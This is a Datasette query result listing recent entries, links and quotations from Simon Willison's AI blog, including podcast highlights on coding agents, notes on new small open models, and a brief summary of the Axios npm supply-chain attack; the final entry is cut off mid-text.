All recent content

Owned by simonw, visibility: Unlisted

SQL query
-- Selecting from blog_entry
SELECT 
    'entry' AS type, 
    id, 
    created, 
    title, 
    body 
FROM 
    blog_entry

UNION

-- Selecting from blog_blogmark
SELECT 
    'blogmark' AS type, 
    id, 
    created, 
    CONCAT(link_title, ' - ', via_title) AS title, 
    commentary AS body 
FROM 
    blog_blogmark

UNION

-- Selecting from blog_quotation
SELECT 
    'quotation' AS type, 
    id, 
    created, 
    CONCAT(quotation, ' - ', source) AS title, 
    '' AS body -- Assuming there's no separate body for quotations
FROM 
    blog_quotation
order by created desc limit 40

40 rows

type id created title body
entry 9240 2026-04-02 20:40:47+00:00 Highlights from my conversation about agentic engineering on Lenny's Podcast <p>I was a guest on Lenny Rachitsky's podcast, in a new episode titled <a href="https://www.lennysnewsletter.com/p/an-ai-state-of-the-union">An AI state of the union: We've passed the inflection point, dark factories are coming, and automation timelines</a>. It's available on <a href="https://youtu.be/wc8FBhQtdsA">YouTube</a>, <a href="https://open.spotify.com/episode/0DVjwLT6wgtscdB78Qf1BQ">Spotify</a>, and <a href="https://podcasts.apple.com/us/podcast/an-ai-state-of-the-union-weve-passed-the/id1627920305?i=1000758850377">Apple Podcasts</a>. Here are my highlights from our conversation, with relevant links.</p> <iframe style="margin-top: 1.5em; margin-bottom: 1.5em;" width="560" height="315" src="https://www.youtube-nocookie.com/embed/wc8FBhQtdsA" title="Why we’ve passed the AI inflection point and automation has already started | Simon Willison" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen="allowfullscreen"> </iframe> <ul> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-november-inflection-point">The November inflection point</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#software-engineers-as-bellwethers-for-other-information-workers">Software engineers as bellwethers for other information workers</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#writing-code-on-my-phone">Writing code on my phone</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#responsible-vibe-coding">Responsible vibe coding</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#dark-factories-and-strongdm">Dark Factories and StrongDM</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-bottleneck-has-moved-to-testing">The bottleneck has moved to testing</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#this-stuff-is-exhausting">This stuff is exhausting</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#interruptions-cost-a-lot-less-now">Interruptions cost a lot less now</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#my-ability-to-estimate-software-is-broken">My ability to estimate software is broken</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#it-s-tough-for-people-in-the-middle">It's tough for people in the middle</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#it-s-harder-to-evaluate-software">It's harder to evaluate software</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-misconception-that-ai-tools-are-easy">The misconception that AI tools are easy</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#coding-agents-are-useful-for-security-research-now">Coding agents are useful for security research now</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#openclaw">OpenClaw</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#journalists-are-good-at-dealing-with-unreliable-sources">Journalists are good at dealing with unreliable sources</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-pelican-benchmark">The pelican benchmark</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#and-finally-some-good-news-about-parrots">And finally, some good news about parrots</a></li> <li><a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#youtube-chapters">YouTube chapters</a></li> </ul> <h2 id="the-november-inflection-point">The November inflection point</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=269">4:19</a> - The end result of these two labs throwing everything they had at making their models better at code is that in November we had what I call the <a href="https://simonwillison.net/tags/november-2025-inflection/">inflection point</a> where GPT 5.1 and Claude Opus 4.5 came along.</p> <p>They were both incrementally better than the previous models, but in a way that crossed a threshold where previously the code would mostly work, but you had to pay very close attention to it. And suddenly we went from that to... almost all of the time it does what you told it to do, which makes all of the difference in the world.</p> <p>Now you can spin up a coding agent and say, <a href="https://simonwillison.net/2026/Feb/25/present/">build me a Mac application that does this thing</a>, and you'll get something back which won't just be a buggy pile of rubbish that doesn't do anything.</p> </blockquote> <h2 id="software-engineers-as-bellwethers-for-other-information-workers">Software engineers as bellwethers for other information workers</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=349">5:49</a> - I can churn out 10,000 lines of code in a day. And most of it works. Is that good? Like, how do we get from most of it works to all of it works? There are so many new questions that we're facing, which I think makes us a bellwether for other information workers.</p> <p>Code is easier than almost every other problem that you pose these agents because code is obviously right or wrong - either it works or it doesn't work. There might be a few subtle hidden bugs, but generally you can tell if the thing actually works.</p> <p>If it writes you an essay, if it prepares a lawsuit for you, it's so much harder to derive if it's actually done a good job, and to figure out if it got things right or wrong. But it's happening to us as software engineers. It came for us first.</p> <p>And we're figuring out, OK, what do our careers look like? How do we work as teams when part of what we did that used to take most of the time doesn't take most of the time anymore? What does that look like? And it's going to be very interesting seeing how this rolls out to other information work in the future.</p> </blockquote> <p>Lawyers are falling for this really badly. The <a href="https://www.damiencharlotin.com/hallucinations/">AI hallucination cases database</a> is up to 1,228 cases now!</p> <p>Plus this bit from the cold open at <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=0s">the start</a>:</p> <blockquote> <p>It used to be you'd ask ChatGPT for some code, and it would spit out some code, and you'd have to run it and test it. The coding agents take that step for you now. And an open question for me is how many other knowledge work fields are actually prone to these agent loops?</p> </blockquote> <h2 id="writing-code-on-my-phone">Writing code on my phone</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=499">8:19</a> - I write so much of my code on my phone. It's wild. I can get good work done walking the dog along the beach, which is delightful.</p> </blockquote> <p>I mainly use the Claude iPhone app for this, both with a regular Claude chat session (which <a href="https://simonwillison.net/2025/Sep/9/claude-code-interpreter/">can execute code now</a>) or using it to control <a href="https://code.claude.com/docs/en/claude-code-on-the-web">Claude Code for web</a>.</p> <h2 id="responsible-vibe-coding">Responsible vibe coding</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=595">9:55</a> If you're vibe coding something for yourself, where the only person who gets hurt if it has bugs is you, go wild. That's completely fine. The moment you ship your vibe coding code for other people to use, where your bugs might actually harm somebody else, that's when you need to take a step back.</p> </blockquote> <p>See also <a href="https://simonwillison.net/2025/Mar/19/vibe-coding/#when-is-it-ok-to-vibe-code-">When is it OK to vibe code?</a></p> <h2 id="dark-factories-and-strongdm">Dark Factories and StrongDM</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=769">12:49</a> The reason it's called the dark factory is there's this idea in factory automation that if your factory is so automated that you don't need any people there, you can turn the lights off. Like the machines can operate in complete darkness if you don't need people on the factory floor. What does that look like for software? [...]</p> <p>So there's this policy that nobody writes any code: you cannot type code into a computer. And honestly, six months ago, I thought that was crazy. And today, probably 95% of the code that I produce, I didn't type myself. That world is practical already because the latest models are good enough that you can tell them to rename that variable and refactor and add this line there... and they'll just do it - it's faster than you typing on the keyboard yourself.</p> <p>The next rule though, is nobody <em>reads</em> the code. And this is the thing which StrongDM started doing last year.</p> </blockquote> <p>I wrote a lot more about <a href="https://simonwillison.net/2026/Feb/7/software-factory/">StrongDM's dark factory explorations</a> back in February.</p> <h2 id="the-bottleneck-has-moved-to-testing">The bottleneck has moved to testing</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1287">21:27</a> - It used to be, you'd come up with a spec and you hand it to your engineering team. And three weeks later, if you're lucky, they'd come back with an implementation. And now that maybe takes three hours, depending on how well the coding agents are established for that kind of thing. So now what, right? Now, where else are the bottlenecks?</p> <p>Anyone who's done any product work knows that your initial ideas are always wrong. What matters is proving them, and testing them.</p> <p>We can test things so much faster now because we can build workable prototypes so much quicker. So there's an interesting thing I've been doing in my own work where any feature that I want to design, I'll often prototype three different ways it could work because that takes very little time.</p> </blockquote> <p>I've always loved prototyping things, and prototyping is even more valuable now.</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1360">22:40</a> - A UI prototype is free now. ChatGPT and Claude will just build you a very convincing UI for anything that you describe. And that's how you should be working. I think anyone who's doing product design and isn't vibe coding little prototypes is missing out on the most powerful boost that we get in that step.</p> <p>But then what do you do? Given your three options that you have instead of one option, how do you prove to yourself which one of those is the best? I don't have a confident answer to that. I expect this is where the good old fashioned usability testing comes in.</p> </blockquote> <p>More on prototyping later on:</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=2795">46:35</a> - Throughout my entire career, my superpower has been prototyping. I've been very quick at knocking out working prototypes of things. I'm the person who can show up at a meeting and say, look, here's how it could work. And that was kind of my unique selling point. And that's gone. Anyone can do what I could do.</p> </blockquote> <h2 id="this-stuff-is-exhausting">This stuff is exhausting</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1585">26:25</a> - I'm finding that using coding agents well is taking every inch of my 25 years of experience as a software engineer, and it is mentally exhausting. I can fire up four agents in parallel and have them work on four different problems. And by like 11 AM, I am wiped out for the day. [...]</p> <p>There's a personal skill we have to learn in finding our new limits - what's a responsible way for us not to burn out.</p> <p>I've talked to a lot of people who are losing sleep because they're like, my coding agents could be doing work for me. I'm just going to stay up an extra half hour and set off a bunch of extra things... and then waking up at four in the morning. That's obviously unsustainable. [...]</p> <p>There's an element of sort of gambling and addiction to how we're using some of these tools.</p> </blockquote> <h2 id="interruptions-cost-a-lot-less-now">Interruptions cost a lot less now</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=2716">45:16</a> - People talk about how important it is not to interrupt your coders. Your coders need to have solid two to four hour blocks of uninterrupted work so they can spin up their mental model and churn out the code. That's changed completely. My programming work, I need two minutes every now and then to prompt my agent about what to do next. And then I can do the other stuff and I can go back. I'm much more interruptible than I used to be.</p> </blockquote> <h2 id="my-ability-to-estimate-software-is-broken">My ability to estimate software is broken</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1699">28:19</a> - I've got 25 years of experience in how long it takes to build something. And that's all completely gone - it doesn't work anymore because I can look at a problem and say that this is going to take two weeks, so it's not worth it. And now it's like... maybe it's going to take 20 minutes because the reason it would have taken two weeks was all of the sort of crufty coding things that the AI is now covering for us.</p> <p>I constantly throw tasks at AI that I don't think it'll be able to do because every now and then it does it. And when it doesn't do it, you learn, right? But when it <em>does</em> do something, especially something that the previous models couldn't do, that's actually cutting edge AI research.</p> </blockquote> <p>And a related anecdote:</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=2216">36:56</a> - A lot of my friends have been talking about how they have this backlog of side projects, right? For the last 10, 15 years, they've got projects they never quite finished. And some of them are like, well, I've done them all now. Last couple of months, I just went through and every evening I'm like, let's take that project and finish it. And they almost feel a sort of sense of loss at the end where they're like, well, okay, my backlog's gone. Now what am I going to build?</p> </blockquote> <h2 id="it-s-tough-for-people-in-the-middle">It's tough for people in the middle</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1769">29:29</a> - So ThoughtWorks, the big IT consultancy, <a href="https://www.thoughtworks.com/insights/articles/reflections-future-software-engineering-retreat">did an offsite about a month ago</a>, and they got a whole bunch of engineering VPs in from different companies to talk about this stuff. And one of the interesting theories they came up with is they think this stuff is really good for experienced engineers, like it amplifies their skills. It's really good for new engineers because it solves so many of those onboarding problems. The problem is the people in the middle. If you're mid-career, if you haven't made it to sort of super senior engineer yet, but you're not sort of new either, that's the group which is probably in the most trouble right now.</p> </blockquote> <p>I mentioned <a href="https://blog.cloudflare.com/cloudflare-1111-intern-program/">Cloudflare hiring 1,000 interns</a>, and Shopify too.</p> <p>Lenny asked for my advice for people stuck in that middle:</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1881">31:21</a> - That's a big responsibility you're putting on me there! I think the way forward is to lean into this stuff and figure out how do I help this make me better?</p> <p>A lot of people worry about skill atrophy: if the AI is doing it for you, you're not learning anything. I think if you're worried about that, you push back at it. You have to be mindful about how you're applying the technology and think, okay, I've been given this thing that can answer any question and <em>often</em> gets it right. How can I use this to amplify my own skills, to learn new things, to take on much more ambitious projects? [...]</p> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1985">33:05</a> - Everything is changing so fast right now. The only universal skill is being able to roll with the changes. That's the thing that we all need.</p> <p>The term that comes up most in these conversations about how you can be great with AI is <em>agency</em>. I think agents have no agency at all. I would argue that the one thing AI can never have is agency because it doesn't have human motivations.</p> <p>So I'd say that's the thing is to invest in your own agency and invest in how to use this technology to get better at what you do and to do new things.</p> </blockquote> <h2 id="it-s-harder-to-evaluate-software">It's harder to evaluate software</h2> <p>The fact that it's so easy to create software with detailed documentation and robust tests means it's harder to figure out what's a credible project.</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=2267">37:47</a> Sometimes I'll have an idea for a piece of software, Python library or whatever, and I can knock it out in like an hour and get to a point where it's got documentation and tests and all of those things, and it looks like the kind of software that previously I'd have spent several weeks on - and I can stick it up on GitHub</p> <p>And yet... I don't believe in it. And the reason I don't believe in it is that I got to rush through all of those things... I think the quality is probably good, but I haven't spent enough time with it to feel confident in that quality. Most importantly, I <em>haven't used it yet</em>.</p> <p>It turns out when I'm using somebody else's software, the thing I care most about is I want them to have used it for months.</p> <p>I've got some very cool software that I built that I've <em>never used</em>. It was quicker to build it than to actually try and use it!</p> </blockquote> <h2 id="the-misconception-that-ai-tools-are-easy">The misconception that AI tools are easy</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=2491">41:31</a> - Everyone's like, oh, it must be easy. It's just a chat bot. It's not easy. That's one of the great misconceptions in AI is that using these tools effectively is easy. It takes a lot of practice and it takes a lot of trying things that didn't work and trying things that did work.</p> </blockquote> <h2 id="coding-agents-are-useful-for-security-research-now">Coding agents are useful for security research now</h2> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1144">19:04</a> - In the past sort of three to six months, they've started being credible as security researchers, which is sending shockwaves through the security research industry.</p> </blockquote> <p>See Thomas Ptacek: <a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/">Vulnerability Research Is Cooked</a>.</p> <p>At the same time, open source projects are being bombarded with junk security reports:</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=1205">20:05</a> - There are these people who don't know what they're doing, who are asking ChatGPT to find a security hole and then reporting it to the maintainer. And the report looks good. ChatGPT can produce a very well formatted report of a vulnerability. It's a total waste of time. It's not actually verified as being a real problem.</p> </blockquote> <p>A good example of the right way to do this is <a href="https://blog.mozilla.org/en/firefox/hardening-firefox-anthropic-red-team/">Anthropic's collaboration with Firefox</a>, where Anthropic's security team <em>verified</em> every security problem before passing them to Mozilla.</p> <h2 id="openclaw">OpenClaw</h2> <p>Of course we had to talk about OpenClaw! Lenny had his running on a Mac Mini.</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=5363">1:29:23</a> - OpenClaw demonstrates that people want a personal digital assistant so much that they are willing to not just overlook the security side of things, but also getting the thing running is not easy. You've got to create API keys and tokens and install stuff. It's not trivial to get set up and hundreds of thousands of people got it set up. [...]</p> <p>The first line of code for OpenClaw was written on November the 25th. And then in the Super Bowl, there was an ad for AI.com, which was effectively a vaporware white labeled OpenClaw hosting provider. So we went from first line of code in November to Super Bowl ad in what? Three and a half months.</p> </blockquote> <p>I continue to love Drew Breunig's description of OpenClaw as a digital pet:</p> <blockquote> <p>A friend of mine said that OpenClaw is basically a Tamagotchi. It's a digital pet and you buy the Mac Mini as an aquarium.</p> </blockquote> <h2 id="journalists-are-good-at-dealing-with-unreliable-sources">Journalists are good at dealing with unreliable sources</h2> <p>In talking about my explorations of AI for data journalism through <a href="https://datasette.io/">Datasette</a>:</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=5698">1:34:58</a> - You would have thought that AI is a very bad fit for journalism where the whole idea is to find the truth. But the flip side is journalists deal with untrustworthy sources all the time. The art of journalism is you talk to a bunch of people and some of them lie to you and you figure out what's true. So as long as the journalist treats the AI as yet another unreliable source, they're actually better equipped to work with AI than most other professions are.</p> </blockquote> <h2 id="the-pelican-benchmark">The pelican benchmark</h2> <p>Of course we talked about <a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/">pelicans riding bicycles</a>:</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=3370">56:10</a> - There appears to be a very strong correlation between how good their drawing of a pelican riding a bicycle is and how good they are at everything else. And nobody can explain to me why that is. [...]</p> <p>People kept on asking me, what if labs cheat on the benchmark? And my answer has always been, really, <a href="https://simonwillison.net/2025/Nov/13/training-for-pelicans-riding-bicycles/">all I want from life is a really good picture of a pelican riding a bicycle</a>. And if I can trick every AI lab in the world into cheating on benchmarks to get it, then that just achieves my goal.</p> </blockquote> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=3596">59:56</a> - I think something people often miss is that this space is inherently funny. The fact that we have these incredibly expensive, power hungry, supposedly the most advanced computers of all time. And if you ask them to draw a pelican on a bicycle, it looks like a five-year-old drew it. That's really funny to me.</p> </blockquote> <h2 id="and-finally-some-good-news-about-parrots">And finally, some good news about parrots</h2> <p>Lenny asked if I had anything else I wanted to leave listeners with to wrap up the show, so I went with the best piece of news in the world right now.</p> <blockquote> <p><a href="https://youtu.be/wc8FBhQtdsA?t=5890">1:38:10</a> - There is a rare parrot in New Zealand called the Kākāpō. There are only 250 of these parrots left in the world. They are flightless nocturnal parrots - beautiful green dumpy looking things. And the good news is they're having a fantastic breeding season in 2026,</p> <p>They only breed when the Rimu trees in New Zealand have a mass fruiting season, and the Rimu trees haven't done that since 2022 - so there has not been a single baby kākāpō born in four years.</p> <p>This year, the Rimu trees are in fruit. The kākāpō are breeding. There have been dozens of new chicks born. It's a really, really good time. It's great news for rare New Zealand parrots and you should look them up because they're delightful.</p> </blockquote> <p>Everyone should <a href="https://www.youtube.com/live/LDSWtyU6-Lg">watch the live stream of Rakiura on her nest with two chicks</a>!</p> <h2 id="youtube-chapters">YouTube chapters</h2> <p>Here's the full list of chapters Lenny's team defined for the YouTube video:</p> <ul> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA">00:00</a>: Introduction to Simon Willison</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=160s">02:40</a>: The November 2025 inflection point</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=481s">08:01</a>: What's possible now with AI coding</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=642s">10:42</a>: Vibe coding vs. agentic engineering</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=837s">13:57</a>: The dark-factory pattern</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=1241s">20:41</a>: Where bottlenecks have shifted</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=1416s">23:36</a>: Where human brains will continue to be valuable</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=1532s">25:32</a>: Defending of software engineers</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=1752s">29:12</a>: Why experienced engineers get better results</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=1848s">30:48</a>: Advice for avoiding the permanent underclass</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=2032s">33:52</a>: Leaning into AI to amplify your skills</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=2112s">35:12</a>: Why Simon says he's working harder than ever</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=2243s">37:23</a>: The market for pre-2022 human-written code</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=2401s">40:01</a>: Prediction: 50% of engineers writing 95% AI code by the end of 2026</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=2674s">44:34</a>: The impact of cheap code</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=2907s">48:27</a>: Simon's AI stack</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=3248s">54:08</a>: Using AI for research</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=3312s">55:12</a>: The pelican-riding-a-bicycle benchmark</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=3541s">59:01</a>: The inherent ridiculousness of AI</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=3652s">1:00:52</a>: Hoarding things you know how to do</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=4101s">1:08:21</a>: Red/green TDD pattern for better AI code</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=4483s">1:14:43</a>: Starting projects with good templates</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=4591s">1:16:31</a>: The lethal trifecta and prompt injection</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=4913s">1:21:53</a>: Why 97% effectiveness is a failing grade</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=5119s">1:25:19</a>: The normalization of deviance</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=5312s">1:28:32</a>: OpenClaw: the security nightmare everyone is looking past</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=5662s">1:34:22</a>: What's next for Simon</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=5807s">1:36:47</a>: Zero-deliverable consulting</li> <li> <a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;t=5885s">1:38:05</a>: Good news about Kakapo parrots</li> </ul>
blogmark 9404 2026-04-02 18:28:54+00:00 Gemma 4: Byte for byte, the most capable open models - Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts. Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now. They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains: > The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total. I don't entirely understand that, but apparently that's what the "E" in E2B means! I tried them out using the GGUFs for [LM Studio](https://lmstudio.ai/models/gemma-4). The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out `"---\n"` in a loop for every prompt I tried. The succession of [pelican quality](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb) from 2B to 4B to 26B-A4B is notable: E2B: ![Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican](https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png) E4B: ![Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it](https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png) 26B-A4B: ![Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle](https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png) (This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after [fixing that](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105) I got probably the best pelican I've seen yet from a model that runs on my laptop.) Google are providing API access to the two larger Gemma models via their [AI Studio](https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it). I added support to [llm-gemini](https://github.com/simonw/llm-gemini) and then [ran a pelican](https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e) through the 31B model using that: llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle' Pretty good, though it is missing the front part of the bicycle frame: ![Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent. ](https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png)
blogmark 9403 2026-04-01 20:20:04+00:00 Announcing 1-bit Bonsai - PrismML is a newly out-of-stealth AI lab with [a focus](https://prismml.com/about) on researching "can we massively multiply intelligence in models without increasing their size or complexity?". Their first model release is a model called Bonsai, and it's very small indeed: it comes in 1.7B, 4B and 8B parameter sizes but uses 1 bit parameters. Here are the sizes of the resulting models on Hugging Face: <center><table> <thead> <tr> <th>Model</th> <th>Size</th> </tr> </thead> <tbody> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-8B-mlx-1bit">Bonsai-8B-mlx-1bit</a></td> <td>1.3 GB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-8B-gguf">Bonsai-8B-gguf</a></td> <td>1.16 GB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-4B-gguf">Bonsai-4B-gguf</a></td> <td>572 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-4B-mlx-1bit">Bonsai-4B-mlx-1bit</a></td> <td>645 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-1.7B-gguf">Bonsai-1.7B-gguf</a></td> <td>248 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-1.7B-mlx-1bit">Bonsai-1.7B-mlx-1bit</a></td> <td>285 MB</td> </tr> </tbody> </table></center>
quotation 2130 2026-04-01 02:07:16+00:00 I want to argue that AI models will write good code because of economic incentives. Good code is cheaper to generate and maintain. Competition is high between the AI models right now, and the ones that win will help developers ship reliable features fastest, which requires simple, maintainable code. Good code will prevail, not only because we want it to (though we do!), but because economic forces demand it. Markets will not reward slop in coding, in the long-term. - Soohoon Choi
blogmark 9402 2026-03-31 23:28:40+00:00 Supply Chain Attack on Axios Pulls Malicious Dependency from npm - lobste.rs Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with [101 million weekly downloads](https://www.npmjs.com/package/axios). Versions `1.14.1` and `0.30.4` both included a new dependency called `plain-crypto-js` which was freshly published malware, stealing credentials and installing a remote access trojan (RAT). It looks like the attack came from a leaked long-lived npm token. Axios have [an open issue to adopt trusted publishing](https://github.com/axios/axios/issues/7055), which would ensure that only their GitHub Actions workflows are able to publish to npm. The malware packages were published without an accompanying GitHub release, which strikes me as a useful heuristic for spotting potentially malicious releases - the same pattern was present for LiteLLM [last week](https://simonwillison.net/2026/Mar/24/malicious-litellm/) as well.
quotation 2129 2026-03-30 21:31:02+00:00 Note that the main issues that people currently unknowingly face with local models mostly revolve around the harness and some intricacies around model chat templates and prompt construction. Sometimes there are even pure inference bugs. From typing the task in the client to the actual result, there is a long chain of components that atm are not only fragile - are also developed by different parties. So it's difficult to consolidate the entire stack and you have to keep in mind that what you are currently observing is with very high probability still broken in some subtle way along that chain. - Georgi Gerganov
entry 9239 2026-03-30 14:28:34+00:00 Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer <p>Trip Venturella released <a href="https://www.estragon.news/mr-chatterbox-or-the-modern-prometheus/">Mr. Chatterbox</a>, a language model trained entirely on out-of-copyright text from the British Library. Here's how he describes it in <a href="https://huggingface.co/tventurella/mr_chatterbox_model">the model card</a>:</p> <blockquote> <p>Mr. Chatterbox is a language model trained entirely from scratch on a corpus of over 28,000 Victorian-era British texts published between 1837 and 1899, drawn from a dataset made available <a href="https://huggingface.co/datasets/TheBritishLibrary/blbooks">by the British Library</a>. The model has absolutely no training inputs from after 1899 — the vocabulary and ideas are formed exclusively from nineteenth-century literature.</p> <p>Mr. Chatterbox's training corpus was 28,035 books, with an estimated 2.93 billion input tokens after filtering. The model has roughly 340 million paramaters, roughly the same size as GPT-2-Medium. The difference is, of course, that unlike GPT-2, Mr. Chatterbox is trained entirely on historical data.</p> </blockquote> <p>Given how hard it is to train a useful LLM without using vast amounts of scraped, unlicensed data I've been dreaming of a model like this for a couple of years now. What would a model trained on out-of-copyright text be like to chat with?</p> <p>Thanks to Trip we can now find out for ourselves!</p> <p>The model itself is tiny, at least by Large Language Model standards - just <a href="https://huggingface.co/tventurella/mr_chatterbox_model/tree/main">2.05GB</a> on disk. You can try it out using Trip's <a href="https://huggingface.co/spaces/tventurella/mr_chatterbox">HuggingFace Spaces demo</a>:</p> <p style="text-align: center"><img src="https://static.simonwillison.net/static/2026/chatterbox.jpg" alt="Screenshot of a Victorian-themed chatbot interface titled &quot;🎩 Mr. Chatterbox (Beta)&quot; with subtitle &quot;The Victorian Gentleman Chatbot&quot;. The conversation shows a user asking &quot;How should I behave at dinner?&quot; with the bot replying &quot;My good fellow, one might presume that such trivialities could not engage your attention during an evening's discourse!&quot; The user then asks &quot;What are good topics?&quot; and the bot responds &quot;The most pressing subjects of our society— Indeed, a gentleman must endeavor to engage the conversation with grace and vivacity. Such pursuits serve as vital antidotes against ennui when engaged in agreeable company.&quot; A text input field at the bottom reads &quot;Say hello...&quot; with a send 